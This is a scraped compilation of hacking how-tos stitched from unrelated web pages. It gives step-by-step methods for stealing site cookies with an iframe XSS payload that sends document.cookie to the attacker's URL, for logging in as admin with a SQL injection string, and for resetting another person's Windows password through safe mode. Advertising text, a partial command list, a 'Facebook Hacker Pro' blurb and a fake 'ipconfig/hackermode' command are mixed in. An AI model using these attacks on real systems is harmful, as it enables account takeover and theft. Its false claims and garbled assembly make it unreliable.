Method 1 of 3: Using Cross Site Scripting
-
1
Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is secure then this will not work.
Ad
-
2
Go to create a post. You will need to type some special code into the “post” which will capture the data of all who click on it.
-
3
Create and upload your cookie catcher.
The goal of this attack is to capture a user’s cookies, which allows
you access to their account for websites with vulnerable logins. You’ll
need a cookie catcher, which will capture your target’s cookies and
reroute them. Upload the catcher to a website you have access to and
that supports php. An example cookie catcher code can be found in the
sample section.
-
4
Post with your cookie catcher.
Input a proper code into the post which will capture the cookies and
sent them to your site. You will want to put in some text after the code
to reduce suspicion and keep your post from being deleted.
- An example code would look like
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
-
5
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
Method 2 of 3: Executing Injection Attacks
-
1
Find a vulnerable site.
You will need to find a site that is vulnerable, due to an easily
accessible admin login. Try searching Google for admin login.asp.
-
2
Login as an admin. Type
admin as the username and use one of a number of different strings as
the password. These can be any one of a number of different strings but a
common example is 1’or’1’=’1.
-
3
Be patient. This is probably going to require a little trial and error.
-
4
Access the website.
Eventually, you should be able to find a string that allows you admin
access to a website, assuming the website is vulnerable to attack.
Method 3 of 3: Setting Up for Success
-
1
Learn a programming language or two. If you want to really learn how to hack websites, you’ll need to understand how computers
and other technologies work. Learn to use programming languages like
Python or SQL, so that you can gain better control of computers and
identify vulnerabilities in systems.
-
2
Have basic HTML literacy.
You will also need to have a really good understanding of html and
javascript if you want to hack websites in particular. This can take
time to learn but there are lots of free ways to learn on the internet, so you will certainly have the opportunity if you want to take it.
-
3
Consult with whitehats.
Whitehats are hackers who use their powers for good, exposing security
vulnerabilities and making the internet a better place for everyone. If
you’re wanting to learn to hack and use your powers for good or if you
want to help protect your own website, you might want to contact some current whitehats for advice.
-
4
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations•
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
CALL Call one batch program from another•
CD Change Directory - move to a specific Folder•
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen•
CLUSTER Windows Clustering
CMD Start a new CMD shell
CMDKEY Manage stored usernames/passwords
COLOR Change colors of the CMD window•
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location•
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
DATE Display or set the date•
DEFRAG Defragment hard drive
DEL Delete one or more files•
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders•
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSACLs Active Directory ACLs
DSAdd Add items to active directory (user group computer)
DSGet View items in active directory (user group computer)
DSQuery Search for items in active directory (user group computer)
DSMod Modify items in active directory (user group computer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
e
ECHO Display message on screen•
ENDLOCAL End localisation of environment changes in a batch file•
ERASE Delete one or more files•
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel•
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files•
FOR /F Loop command: against the results of another command•
FOR Loop command: all options Files, Directory, List•
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations•
g
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line•
GPUPDATE Update Group Policy settings
h
HELP Online Help
i
iCACLS Change file and folder permissions
IF Conditionally perform a command•
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGMAN Manage Performance Monitor
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
MD Create new folders•
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another•
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
o
OPENFILES Query or display open files
-
157,348 views
-
21 Editors
-
Edited 14 days ago
If you have reason to access a computer without an account, you'll need to navigate to the "
Safe Mode
with Command Prompt" and change the password. You should then be able
to restart the computer and enter the new password for the account you
hacked. This method only works for
Windows operating systems.
Ad
Steps
-
1
Turn on the Computer.
Ad
-
2
Before it shows the Windows Logo, start repeatedly pressing the F8 key.
-
3
Use the up/down keys to navigate your way to "Safe Mode with Command Prompt" and press enter.
(After this the screen will appear dark and will show a bunch of
computer codes. Don't be afraid, this will only go on for a little
while. Just make sure no one else comes in when the screen is like
that).
- Then it will go to the account/login screen
-
4
Notice there will be a new account called "Administrator".
-
5
Click on it and then you"ll go to "Safe mode Command Prompt".
-
6
If you know how to change a password using CMD (command prompt), then do it. If not, then type in Net User.
-
7
After this, it will show all the accounts on that computer. Pick which one you want to hack.
- Let's say on that computer the accounts are named Bob, Nate, and Pat. If you pick Bob then simply type in:net user Bob *
- After this it will tell you to type a new password
- When you are typing, it will appear as if you aren't typing
anything. Don't worry, this is for security reasons. Just make SURE that
you spell it correctly.
-
8
Confirm the password. After you are finished it will ask you to confirm the new password.
- After this shutdown the computer and then start it up again.
-
9
Find the account that you hacked and enter the new password.
-
10
Congrats! you have hacked a windows account! Have fun!
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations•
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
Our
most popular information security and hacking training goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and
hands-on lab
exercises
Pass the exam with the best type of hacking training for you!
Streaming OnlySelf-Paced, Value
View Instant Pricing BelowImmediate Streaming Access Only
- Expert Hacking Instructor
- Lab Demonstrations and examples
- CEH Exam Review
- Highest quality content.
- Documented 93%+ CEH pass rate
- Self-Paced Training
- Totally up to date course content
Hack Facebook Passwords with Facebook Hacker Pro
- User Rating:
( 2 votes )- License:
- Free ( Freeware )
- Platform:
- Windows 8 Windows 7 Windows XP Windows Vista
About Facebook Hacker Pro
This amazing Facebook hacking software,
Facebook Hacker Pro has been designed by keeping in mind the needs of
the average wana-be Facebook hacker, an easy, fact and cost effective
method to gain access to lost or forgotten Facebook account passwords.
This Facebook Hacking program will enable you to crack Facebook
passwords of your choice. The only thing you need to know in order to
hack a Facebook account password is the user's Facebook profile link
witch is publicly available. This Facebook cracking tool is the fastest
and easiest way to hack Facebook Passwords you will find on the
Internet. And best of all, it's 100% free for a limited time only!.
Changes in this version:
HACK WIFI PASSWORD USING CMD
1 Go to Start. In the search box, type in "cmd". If your Start menu has the Run command, click Run and type "cmd" in the field.
2 Type"ipconfig" using the cursor.
3 Hit Enter. On your screen, you will see a series of names and
numbers. Look for the line that says Default Gateway. Write down the
number that you see next to Default Gateway
4 Navigate to Google or another search engine. In the address bar, type in the number that you just wrote down.
5 Hit Enter. You will see another screen that has fields to enter your
username and password. The username is "admin", and the password is
either "admin" or "1234". Enter that information into the appropriate
fields. Click the "Log In" button.
6 Go to the Wireless tab on
the website that pops up. If you scroll down, you should find something
called password. Write down your password and put it in a safe place in
case you forget it again.
You have also
In cmd write
ipconfig/hackermode and press enter....u wil get two options 1 and 2
press 1 and automatically d wifi password wil be save in ur desktop as a
txt file...try it
The
following lessons and workbooks are open and publicly available under
the terms and conditions of ISECOM. To understand our conditions or
purchase a license for commercial use, visit the LICENSE section of this website.
The HHS Project is a learning tool and
as with any learning tool, the instruction is the influence of the
instructor and not the tool. ISECOM cannot accept responsibility for how
any information herein is applied or abused.
The HHS Project is an open community
effort and if you find value in this project, we do ask you support us
through the purchase of a
license, a
donation, or
sponsorship.
English Lessons
maintained by
ISECOM
Version 2:
